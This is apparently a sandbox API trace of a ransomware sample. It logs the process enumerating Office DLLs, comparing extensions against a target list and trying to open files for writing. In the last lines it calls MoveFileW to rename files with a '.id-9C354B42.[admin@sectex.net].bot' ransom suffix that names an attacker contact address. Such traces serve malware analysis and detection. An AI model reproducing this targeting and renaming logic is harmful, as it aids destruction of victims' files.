	[0139.250] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0139.250] lstrlenW (lpString=".7z") returned 3
	[0139.250] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0139.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 66
	[0139.250] lstrlenW (lpString=".dbf") returned 4
	[0139.250] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0139.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 66
	[0139.250] lstrlenW (lpString=".1cd") returned 4
	[0139.250] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0139.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 66
	[0139.250] lstrlenW (lpString=".jpg") returned 4
	[0139.250] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0139.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 66
	[0139.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 66
	[0139.250] lstrlenW (lpString=".doc") returned 4
	[0139.250] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0139.250] lstrlenW (lpString=".docx") returned 5
	[0139.250] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0139.250] lstrlenW (lpString=".pdf") returned 4
	[0139.250] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0139.250] lstrlenW (lpString=".xls") returned 4
	[0139.250] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0139.250] lstrlenW (lpString=".xlsx") returned 5
	[0139.250] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0139.250] lstrlenW (lpString=".ppt") returned 4
	[0139.250] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0139.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 66
	[0139.250] lstrlenW (lpString=".zip") returned 4
	[0139.250] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0139.251] lstrlenW (lpString=".rar") returned 4
	[0139.251] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0139.251] lstrlenW (lpString=".bz2") returned 4
	[0139.251] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0139.251] lstrlenW (lpString=".7z") returned 3
	[0139.251] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0139.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 66
	[0139.251] lstrlenW (lpString=".dbf") returned 4
	[0139.251] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0139.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 66
	[0139.251] lstrlenW (lpString=".1cd") returned 4
	[0139.251] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0139.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 66
	[0139.251] lstrlenW (lpString=".jpg") returned 4
	[0139.251] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0139.251] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0139.251] lstrlenW (lpString="OPHPROXY.DLL") returned 12
	[0139.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ophproxy.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0139.252] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=19848) returned 1
	[0139.252] CloseHandle (hObject=0x384) returned 1
	[0139.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ophproxy.dll")) returned 0x20
	[0139.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ophproxy.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.253] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ophproxy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0139.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68
	[0139.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68
	[0139.253] lstrlenW (lpString=".doc") returned 4
	[0139.253] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0139.253] lstrlenW (lpString=".docx") returned 5
	[0139.253] lstrcmpiW (lpString1=".docx", lpString2="Y.DLL") returned -1
	[0139.253] lstrlenW (lpString=".pdf") returned 4
	[0139.253] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0139.253] lstrlenW (lpString=".xls") returned 4
	[0139.253] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0139.253] lstrlenW (lpString=".xlsx") returned 5
	[0139.253] lstrcmpiW (lpString1=".xlsx", lpString2="Y.DLL") returned -1
	[0139.253] lstrlenW (lpString=".ppt") returned 4
	[0139.253] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0139.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68
	[0139.253] lstrlenW (lpString=".zip") returned 4
	[0139.253] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0139.253] lstrlenW (lpString=".rar") returned 4
	[0139.253] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0139.253] lstrlenW (lpString=".bz2") returned 4
	[0139.253] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0139.253] lstrlenW (lpString=".7z") returned 3
	[0139.253] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0139.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68
	[0139.253] lstrlenW (lpString=".dbf") returned 4
	[0139.254] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0139.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68
	[0139.254] lstrlenW (lpString=".1cd") returned 4
	[0139.254] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0139.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68
	[0139.254] lstrlenW (lpString=".jpg") returned 4
	[0139.254] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0139.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68
	[0139.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68
	[0139.254] lstrlenW (lpString=".doc") returned 4
	[0139.254] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0139.254] lstrlenW (lpString=".docx") returned 5
	[0139.254] lstrcmpiW (lpString1=".docx", lpString2="Y.DLL") returned -1
	[0139.254] lstrlenW (lpString=".pdf") returned 4
	[0139.254] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0139.254] lstrlenW (lpString=".xls") returned 4
	[0139.254] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0139.254] lstrlenW (lpString=".xlsx") returned 5
	[0139.254] lstrcmpiW (lpString1=".xlsx", lpString2="Y.DLL") returned -1
	[0139.254] lstrlenW (lpString=".ppt") returned 4
	[0139.254] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0139.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68
	[0139.254] lstrlenW (lpString=".zip") returned 4
	[0139.254] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0139.254] lstrlenW (lpString=".rar") returned 4
	[0139.254] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0139.254] lstrlenW (lpString=".bz2") returned 4
	[0139.254] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0139.254] lstrlenW (lpString=".7z") returned 3
	[0139.254] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0139.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68
	[0139.254] lstrlenW (lpString=".dbf") returned 4
	[0139.255] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0139.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68
	[0139.255] lstrlenW (lpString=".1cd") returned 4
	[0139.255] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0139.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68
	[0139.255] lstrlenW (lpString=".jpg") returned 4
	[0139.255] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0139.255] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0139.255] lstrlenW (lpString="OPTINPS.DLL") returned 11
	[0139.255] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\optinps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390
	[0139.329] GetFileSizeEx (in: hFile=0x390, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=18336) returned 1
	[0139.329] CloseHandle (hObject=0x390) returned 1
	[0139.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\optinps.dll")) returned 0x20
	[0139.356] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\optinps.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.356] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\optinps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0139.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67
	[0139.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67
	[0139.356] lstrlenW (lpString=".doc") returned 4
	[0139.356] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0139.356] lstrlenW (lpString=".docx") returned 5
	[0139.356] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0139.356] lstrlenW (lpString=".pdf") returned 4
	[0139.356] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0139.356] lstrlenW (lpString=".xls") returned 4
	[0139.356] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0139.356] lstrlenW (lpString=".xlsx") returned 5
	[0139.356] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0139.356] lstrlenW (lpString=".ppt") returned 4
	[0139.356] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0139.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67
	[0139.356] lstrlenW (lpString=".zip") returned 4
	[0139.357] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0139.357] lstrlenW (lpString=".rar") returned 4
	[0139.357] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0139.357] lstrlenW (lpString=".bz2") returned 4
	[0139.357] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0139.357] lstrlenW (lpString=".7z") returned 3
	[0139.357] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0139.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67
	[0139.357] lstrlenW (lpString=".dbf") returned 4
	[0139.357] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0139.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67
	[0139.357] lstrlenW (lpString=".1cd") returned 4
	[0139.357] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0139.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67
	[0139.357] lstrlenW (lpString=".jpg") returned 4
	[0139.357] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0139.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67
	[0139.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67
	[0139.357] lstrlenW (lpString=".doc") returned 4
	[0139.357] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0139.357] lstrlenW (lpString=".docx") returned 5
	[0139.357] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0139.357] lstrlenW (lpString=".pdf") returned 4
	[0139.357] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0139.357] lstrlenW (lpString=".xls") returned 4
	[0139.357] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0139.357] lstrlenW (lpString=".xlsx") returned 5
	[0139.357] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0139.357] lstrlenW (lpString=".ppt") returned 4
	[0139.357] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0139.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67
	[0139.357] lstrlenW (lpString=".zip") returned 4
	[0139.357] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0139.357] lstrlenW (lpString=".rar") returned 4
	[0139.358] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0139.358] lstrlenW (lpString=".bz2") returned 4
	[0139.358] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0139.358] lstrlenW (lpString=".7z") returned 3
	[0139.358] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0139.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67
	[0139.358] lstrlenW (lpString=".dbf") returned 4
	[0139.358] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0139.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67
	[0139.358] lstrlenW (lpString=".1cd") returned 4
	[0139.358] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0139.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67
	[0139.358] lstrlenW (lpString=".jpg") returned 4
	[0139.358] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0139.358] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0139.358] lstrlenW (lpString="PJ11OD11.DLL") returned 12
	[0139.358] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pj11od11.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360
	[0139.369] GetFileSizeEx (in: hFile=0x360, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=752552) returned 1
	[0139.369] CloseHandle (hObject=0x360) returned 1
	[0139.369] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pj11od11.dll")) returned 0x20
	[0139.369] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pj11od11.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.369] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pj11od11.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0139.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68
	[0139.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68
	[0139.369] lstrlenW (lpString=".doc") returned 4
	[0139.369] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0139.370] lstrlenW (lpString=".docx") returned 5
	[0139.370] lstrcmpiW (lpString1=".docx", lpString2="1.DLL") returned -1
	[0139.370] lstrlenW (lpString=".pdf") returned 4
	[0139.370] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0139.370] lstrlenW (lpString=".xls") returned 4
	[0139.370] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0139.370] lstrlenW (lpString=".xlsx") returned 5
	[0139.370] lstrcmpiW (lpString1=".xlsx", lpString2="1.DLL") returned -1
	[0139.370] lstrlenW (lpString=".ppt") returned 4
	[0139.370] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0139.370] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68
	[0139.370] lstrlenW (lpString=".zip") returned 4
	[0139.370] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0139.370] lstrlenW (lpString=".rar") returned 4
	[0139.370] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0139.370] lstrlenW (lpString=".bz2") returned 4
	[0139.370] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0139.370] lstrlenW (lpString=".7z") returned 3
	[0139.370] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0139.370] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68
	[0139.370] lstrlenW (lpString=".dbf") returned 4
	[0139.370] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0139.370] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68
	[0139.370] lstrlenW (lpString=".1cd") returned 4
	[0139.370] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0139.370] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68
	[0139.370] lstrlenW (lpString=".jpg") returned 4
	[0139.370] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0139.370] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68
	[0139.370] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68
	[0139.370] lstrlenW (lpString=".doc") returned 4
	[0139.370] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0139.370] lstrlenW (lpString=".docx") returned 5
	[0139.370] lstrcmpiW (lpString1=".docx", lpString2="1.DLL") returned -1
	[0139.371] lstrlenW (lpString=".pdf") returned 4
	[0139.371] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0139.371] lstrlenW (lpString=".xls") returned 4
	[0139.371] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0139.371] lstrlenW (lpString=".xlsx") returned 5
	[0139.371] lstrcmpiW (lpString1=".xlsx", lpString2="1.DLL") returned -1
	[0139.371] lstrlenW (lpString=".ppt") returned 4
	[0139.371] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0139.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68
	[0139.371] lstrlenW (lpString=".zip") returned 4
	[0139.371] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0139.371] lstrlenW (lpString=".rar") returned 4
	[0139.371] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0139.371] lstrlenW (lpString=".bz2") returned 4
	[0139.371] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0139.371] lstrlenW (lpString=".7z") returned 3
	[0139.371] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0139.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68
	[0139.371] lstrlenW (lpString=".dbf") returned 4
	[0139.371] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0139.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68
	[0139.371] lstrlenW (lpString=".1cd") returned 4
	[0139.371] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0139.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68
	[0139.371] lstrlenW (lpString=".jpg") returned 4
	[0139.371] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0139.371] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0139.371] lstrlenW (lpString="OSPPC.DLL") returned 9
	[0139.371] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360
	[0139.373] GetFileSizeEx (in: hFile=0x360, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=148736) returned 1
	[0139.373] CloseHandle (hObject=0x360) returned 1
	[0139.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll")) returned 0x20
	[0139.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.373] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0139.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL") returned 89
	[0139.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL") returned 89
	[0139.373] lstrlenW (lpString=".doc") returned 4
	[0139.373] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0139.373] lstrlenW (lpString=".docx") returned 5
	[0139.373] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1
	[0139.373] lstrlenW (lpString=".pdf") returned 4
	[0139.373] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0139.374] lstrlenW (lpString=".xls") returned 4
	[0139.374] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0139.374] lstrlenW (lpString=".xlsx") returned 5
	[0139.374] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1
	[0139.374] lstrlenW (lpString=".ppt") returned 4
	[0139.374] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0139.374] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL") returned 89
	[0139.374] lstrlenW (lpString=".zip") returned 4
	[0139.374] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0139.374] lstrlenW (lpString=".rar") returned 4
	[0139.374] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0139.374] lstrlenW (lpString=".bz2") returned 4
	[0139.374] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0139.374] lstrlenW (lpString=".7z") returned 3
	[0139.374] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0139.374] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL") returned 89
	[0139.374] lstrlenW (lpString=".dbf") returned 4
	[0139.374] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0139.374] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppcext.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppcext.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.375] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.376] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppsvc.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppsvc.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0
